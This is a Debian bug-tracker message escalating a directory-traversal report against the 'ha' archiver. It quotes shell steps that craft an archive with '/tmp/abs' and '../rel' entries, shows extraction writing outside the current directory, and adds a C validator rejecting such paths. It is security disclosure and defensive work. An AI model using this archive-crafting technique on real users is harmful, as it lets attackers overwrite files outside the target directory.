package ha
severity 774954 grave
tag 774954 +help
thanks

> ha is susceptible to directory traversal vulnerabilities. While
> extracting an archive, it will happily use absolute and relative paths
> taken from the archive. This can be exploited by a malicious archive to
> write files outside the current directory.

This is a serious issue, which IMHO makes this package unfit for release. I have neither the time nor the qualification to deal with it properly, so any help would be welcome. Thanks.

On Fri, Jan 9, 2015, at 13:32, Alexander Cherepanov wrote:
> Package: ha
> Version: 0.999p+dfsg-5
> Tags: security
>
> ha is susceptible to directory traversal vulnerabilities. While
> extracting an archive, it will happily use absolute and relative paths
> taken from the archive. This can be exploited by a malicious archive to
> write files outside the current directory.
>
> ha seems to store file names separately from their paths. Directory
> traversals are possible through both of the parts.
>
> 1. Through the file name part.
>
> A sample archive can be prepared in the following way:
>
> $ touch XtmpXabs XXXrel
> $ ha a test.ha XtmpXabs XXXrel
> $ sed -i 's|XtmpXabs|/tmp/abs|g;s|XXXrel|../rel|g' test.ha
> $ rm XtmpXabs XXXrel
>
> Then check that it works:
>
> $ ls /tmp/abs ../rel
> ls: cannot access /tmp/abs: No such file or directory
> ls: cannot access ../rel: No such file or directory
>
> $ ha lf test.ha
> HA 0.999 Copyright (c) 1995 Harri Hirvola
>
> Archive : test.ha (2 files)
>
> filename   original  compressed     rate  date        time   m    CRC-32    path    attr
> ===========================================================================
> /tmp/abs          0           0  100.0 %  2015-01-09  15:24  CPY  00000000  (none)  -rw-r--r--
> ---------------------------------------------------------------------------
> ../rel            0           0  100.0 %  2015-01-09  15:24  CPY  00000000  (none)  -rw-r--r--
> ===========================================================================
>        2          0           0  100.0 %
>
> $ ha x test.ha
> HA 0.999 Copyright (c) 1995 Harri Hirvola
>
> Archive : test.ha (2 files)
>
> Unpacking CPY 100 % /tmp/abs
> Unpacking CPY 100 % ../rel
>
> $ ls /tmp/abs ../rel
> ../rel  /tmp/abs
>
> 2. Through the path part.
>
> A sample archive can be prepared in the following way:
>
> $ mkdir Xtmp/ XX/
> $ touch Xtmp/abs XX/rel
> $ ha a test.ha Xtmp/abs XX/rel
> $ sed -i 's|Xtmp|/tmp|g;s|XX|..|g' test.ha
> $ rm -r Xtmp/ XX/
>
> Then check that it works:
>
> $ ls /tmp/abs ../rel
> ls: cannot access /tmp/abs: No such file or directory
> ls: cannot access ../rel: No such file or directory
>
> $ ha lf test.ha
> HA 0.999 Copyright (c) 1995 Harri Hirvola
>
> Archive : test.ha (2 files)
>
> filename   original  compressed     rate  date        time   m    CRC-32    path    attr
> ===========================================================================
> abs               0           0  100.0 %  2015-01-09  15:29  CPY  00000000  /tmp/   -rw-r--r--
> ---------------------------------------------------------------------------
> rel               0           0  100.0 %  2015-01-09  15:29  CPY  00000000  ../     -rw-r--r--
> ===========================================================================
>        2          0           0  100.0 %
>
> $ ha x test.ha
> HA 0.999 Copyright (c) 1995 Harri Hirvola
>
> Archive : test.ha (2 files)
>
> Unpacking CPY 100 % /tmp/abs
> Unpacking CPY 100 % ../rel
>
> $ ls /tmp/abs ../rel
> ../rel  /tmp/abs
>
> --
> Alexander Cherepanov
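The report shows that ha keeps a directory part and a file-name part for each entry and that either one can carry an absolute path or a ".." component. The check below is an added example of what an extractor needs to do before creating a file; it is not ha's code and not part of the bug report. The function names (safe_extract_path and the two helpers), the fixed destination "out", and the rule set (reject a leading "/" and any ".." component in either part, then join under the destination directory) are this example's own assumptions. The four hostile entries it feeds in are the ones from the report; the benign entries are constructed.

```c
#include <stdio.h>
#include <string.h>

/* True for a component that climbs out of the extraction directory. */
static int component_is_dotdot(const char *comp, size_t len)
{
    return len == 2 && comp[0] == '.' && comp[1] == '.';
}

/* Lexical check of one archive-supplied part (stored directory or stored name).
 * Rejects absolute paths ("/tmp/abs") and any ".." component ("../rel").
 * Only '/' is treated as a separator (assumption: the Unix build of the format). */
static int part_is_safe(const char *part)
{
    const char *p = part;

    if (*p == '/')
        return 0;
    while (*p) {
        const char *start = p;
        while (*p && *p != '/')
            p++;
        if (component_is_dotdot(start, (size_t)(p - start)))
            return 0;
        if (*p == '/')
            p++;
    }
    return 1;
}

/* Validate both halves of an entry and join them under destdir.
 * Returns 0 and fills out[] on success, -1 if the entry must not be created.
 * dirpart may be NULL or "" when the archive stores no path for the entry. */
int safe_extract_path(const char *destdir, const char *dirpart,
                      const char *namepart, char *out, size_t outlen)
{
    int n;

    if (dirpart == NULL)
        dirpart = "";
    if (namepart == NULL || *namepart == '\0')
        return -1;                          /* nothing sensible to create */
    if (!part_is_safe(dirpart) || !part_is_safe(namepart))
        return -1;                          /* traversal via either half */

    if (*dirpart == '\0')
        n = snprintf(out, outlen, "%s/%s", destdir, namepart);
    else if (dirpart[strlen(dirpart) - 1] == '/')
        n = snprintf(out, outlen, "%s/%s%s", destdir, dirpart, namepart);
    else
        n = snprintf(out, outlen, "%s/%s/%s", destdir, dirpart, namepart);

    if (n < 0 || (size_t)n >= outlen)
        return -1;                          /* truncated: refuse rather than guess */
    return 0;
}

/* Convenience wrappers with a fixed destination directory "out" (assumed). */
int entry_is_rejected(const char *dirpart, const char *namepart)
{
    char buf[256];
    return safe_extract_path("out", dirpart, namepart, buf, sizeof buf) != 0;
}

int entry_joins_to(const char *dirpart, const char *namepart, const char *expected)
{
    char buf[256];
    if (safe_extract_path("out", dirpart, namepart, buf, sizeof buf) != 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    /* The four entries from the report (two via the name part, two via the
     * path part) plus one constructed benign entry. */
    const char *cases[][2] = {
        { "",      "/tmp/abs" },
        { "",      "../rel"   },
        { "/tmp/", "abs"      },
        { "../",   "rel"      },
        { "docs/", "README"   },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        char buf[256];
        int rc = safe_extract_path("out", cases[i][0], cases[i][1], buf, sizeof buf);
        printf("path=%-6s name=%-9s -> %s\n", cases[i][0], cases[i][1],
               rc == 0 ? buf : "REJECTED");
    }
    return 0;
}
```

The check is purely lexical, so it closes the two holes the report demonstrates but not a third one common to archivers: a symlink created by an earlier entry can redirect a later, lexically clean entry outside the destination. An extractor that wants to be robust against that also opens files relative to the destination directory with O_NOFOLLOW (or refuses to extract symlinks at all).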